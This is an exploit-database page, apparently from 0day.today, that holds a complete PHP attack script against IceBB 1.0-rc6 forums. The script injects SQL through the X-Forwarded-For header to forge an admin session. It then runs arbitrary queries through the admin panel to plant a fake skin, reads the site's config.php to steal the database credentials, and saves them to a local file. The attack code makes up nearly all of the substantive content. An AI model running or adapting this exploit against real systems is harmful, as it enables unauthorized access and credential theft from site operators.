0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

IceBB 1.0-rc6 Remote Database Authentication Details Exploit

Author

Gu1ll4um3r0m41n

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-2292

Category

web applications

Date add

18-11-2007

Platform

unsorted

============================================================
IceBB 1.0-rc6 Remote Database Authentication Details Exploit
============================================================



<?php
/*---------------------------------------------------------*\
IceBB 1.0-rc6 - Database Authentication Details Exploit

[|Description:|]
A security breach has been discoverd in IceBB 1.0-rc6.
This breach is caused by a bad filtering of the X-Forwarded-For variable:

> ./includes/functions.php, line 73
$ip	 = empty($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['REMOTE_ADDR'] : $_SERVER['HTTP_X_FORWARDED_FOR'];
$ip	= $this->clean_key($ip);
$input['ICEBB_USER_IP']	= $ip;

> ./icebb.php, line 169
$icebb->client_ip	= $input['ICEBB_USER_IP'];

> ./admin/index.php, line 112
$icebb->adsess	= $db->fetch_result("SELECT adsess.*,u.id as userid,u.username,u.temp_ban,g.g_view_board FROM icebb_adsess AS adsess LEFT JOIN icebb_users AS u ON u.username=adsess.user LEFT JOIN icebb_groups AS g ON u.user_group=g.gid WHERE adsess.asid='{$icebb->input['s']}' AND adsess.ip='{$icebb->client_ip}' LIMIT 1");

A hacker could exploit this security breach in order to alter a SQL request.

[|Advisory:|]
http://www.aeroxteam.fr/advisory-IceBB-1.0rc6.txt

[|Solution:|]
No one. Think about update your forum core when a patch will be available on the official website.

Discovered by Gu1ll4um3r0m41n (aeroxteam --[at]-- gmail --[dot]-- com)
for AeroX (AeroXteam.fr)
(C)opyleft 2007
Greetz: Math?, KERNEL_ERROR, NeoMorphS, Snake91, Goundy, Alkino (...) And everybody from #aerox
\*---------------------------------------------------------*/

if(count($argv) == 4) {
	head();
	if($argv[3] != 1 && $argv[3] != 2) {
		die("\r\nIncorrect version !");
	} else {
		$version = $argv[3];
	}
	
	
	############## PART 1 ##############
	echo "[+] Connecting... ";
	$sock = fsockopen($argv[1], 80, $eno, $estr, 30);
	if (!$sock) {
		die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !");
	}
	echo "OK\r\n";
	echo "[+] Getting tables prefix... ";
	$query1  = "GET ".$argv[2]."index.php?s=fake_sid&act=sql HTTP/1.1\r\n";
	$query1 .= "Host: ".$argv[1]."\r\n";
	$query1 .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\r\n";
	$query1 .= "X-Forwarded-For: ".getInj()."\r\n";
	$query1 .= "Accept: */*\r\n";
	$query1 .= "Connection: Close\r\n\r\n";
	fwrite($sock, $query1);
	$result1 = '';
	while(!feof($sock)) {
		$result1 .= fgets($sock);
	}
	fclose($sock);
	if(preg_match("`<tr><td class='row2'><a href='index\.php\?s=my_sessid&act=sql&table=(.*?)adsess'>`", $result1, $expreg)) {
		if($expreg[1] == '') {
			echo "Failed\r\n\r\nExploit Failed :(";
			die();
		}
		$prefix = $expreg[1];
		echo "OK (".$expreg[1].")\r\n";
	} else {
		echo "Failed\r\n\r\nExploit Failed :(";
		die();
	}
	
	############## PART 2 ##############
	echo "[+] Creating fake skin... ";
	$sock = fsockopen($argv[1], 80, $eno, $estr, 30);
	if (!$sock) {
		die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !");
	}
	$postdata2 = "act=sql&func=runquery&query=INSERT+INTO+%60".$prefix."skins%60+%28%60skin_id%60%2C+%60skin_name%60%2C+%60skin_author%60%2C+%60skin_site%60%2C+%60skin_folder%60%2C+%60skin_preview%60%2C+%60skin_is_default%60%2C+%60skin_is_hidden%60%2C+%60skin_wrapper%60%2C+%60skin_macro_cache%60%2C+%60smiley_set%60%29+VALUES+%28666%2C+0x6F776E4564%2C+0x6834783072%2C+0x687474703A2F2F7777772E676F6F676C652E6672%2C+0x2E2E%2C+0x00%2C+0%2C+1%2C+0x00%2C+0x00%2C+0x00%29%3B";
	$query2  = "POST ".$argv[2]."index.php?s=fake_sid HTTP/1.1\r\n";
	$query2 .= "Host: ".$argv[1]."\r\n";
	$query2 .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\r\n";
	$query2 .= "X-Forwarded-For: ".getInj()."\r\n";
	$query2 .= "Accept: */*\r\n";
	$query2 .= "Connection: Close\r\n";
	$query2 .= "Content-Type: application/x-www-form-urlencoded\r\n";
	$query2 .= "Content-Length: ".strlen($postdata2)."\r\n\r\n";
	$query2 .= $postdata2;
	fwrite($sock, $query2);
	$result2 = '';
	while(!feof($sock)) {
		$result2 .= fgets($sock);
	}
	fclose($sock);
	if(strpos($result2, "<textarea name='query' rows='5' cols='50'>INSERT INTO `".$prefix."skins` (`skin_id`, `skin_name`, `skin_author`, `skin_site`, `skin_folder`, `skin_preview`, `skin_is_default`, `skin_is_hidden`, `skin_wrapper`, `skin_macro_cache`, `smiley_set`) VALUES (666, 0x6F776E4564, 0x6834783072, 0x687474703A2F2F7777772E676F6F676C652E6672, 0x2E2E, 0x00, 0, 1, 0x00, 0x00, 0x00);</textarea>") === FALSE) {
		echo "Failed. Maybe Skin already exists ?\r\n";
	} else {
		echo "OK\r\n";
	}
	
	
	############## PART 3 ##############
	echo "[+] Getting config.php... ";
	$sock = fsockopen($argv[1], 80, $eno, $estr, 30);
	if (!$sock) {
		die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !");
	}
	$query3  = "GET ".$argv[2]."index.php?s=fake_sid&act=skins&func=templates&skinid=666&code=edit&template=config HTTP/1.1\r\n";
	$query3 .= "Host: ".$argv[1]."\r\n";
	$query3 .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\r\n";
	$query3 .= "X-Forwarded-For: ".getInj()."\r\n";
	$query3 .= "Accept: */*\r\n";
	$query3 .= "Connection: Close\r\n\r\n";
	fwrite($sock, $query3);
	$result3 = '';
	while(!feof($sock)) {
		$result3 .= fgets($sock);
	}
	fclose($sock);
	if(preg_match("`(<\?php.*\?>)`s", $result3, $expreg2)) {
		echo "OK\r\n\r\n";
		echo $expreg2[1];
	} else {
		echo "Failed\r\n\r\nExploit Failed :(";
	}
	
	
	############## PART 4 ##############
	echo "\r\n\r\n[+] Removing fake skin... ";
	$sock = fsockopen($argv[1], 80, $eno, $estr, 30);
	if (!$sock) {
		die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !");
	}
	$query4  = "GET ".$argv[2]."index.php?s=fake_sid&act=skins&func=disable&skinid=666 HTTP/1.1\r\n";
	$query4 .= "Host: ".$argv[1]."\r\n";
	$query4 .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\r\n";
	$query4 .= "X-Forwarded-For: ".getInj()."\r\n";
	$query4 .= "Accept: */*\r\n";
	$query4 .= "Connection: Close\r\n\r\n";
	fwrite($sock, $query4);
	fclose($sock);
	echo "OK\r\n\r\n";
	echo "Do you want to create a local config.php file ? (Y/N) ";
	$a = strtoupper(trim(fgets(STDIN)));
	if($a == 'Y') {
		$handle = fopen('config_'.$argv[1].'_'.time().'.php', 'w');
		fwrite($handle, $expreg2[1]);
		fclose($handle);
	}
	
} else {
	usage();
}
function getInj() {
	global $version;
	if($version == 1) {
		return "' AND 1=2 UNION SELECT 'my_sessid' as asid, 'lol' as user, '127.0.0.1' as ip, ".(time() - 60)." as logintime, 'home' as location, ".(time() - 55)." as last_action, 1 as userid, 'lol' as username /*";
	} elseif($version == 2) {
		return "' AND 1=2 UNION SELECT 'my_sessid' as asid, 'lol' as user, '127.0.0.1' as ip, ".(time() - 60)." as logintime, 'home' as location, ".(time() - 55)." as last_action, 1 as userid, 'lol' as username, 0 as temp_ban, 1 as g_view_board /*";
	}
}
function usage() {
	echo "+-------------------------------------------------------+\r\n";
	echo "|   IceBB <= 1.0-rc6 Database Authentication Details    |\r\n";
	echo "|             By Gu1ll4um3r0m41n for AeroX              |\r\n";
	echo "| Usage: php exploit.php site.com /pathtoadmin/ version |\r\n";
	echo "|                Version:   1 = rc5                     |\r\n";
	echo "|                           2 = rc6                     |\r\n";
	echo "+-------------------------------------------------------+\r\n";
}
function head() {
	echo "+--------------------------------------------------+\r\n";
	echo "| IceBB <= 1.0-rc6 Database Authentication Details |\r\n";
	echo "|           By Gu1ll4um3r0m41n for AeroX           |\r\n";
	echo "+--------------------------------------------------+\r\n\r\n";
}
?>



#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

IceBB 1.0-rc6 Remote Database Authentication Details Exploit

Report Error

Report Error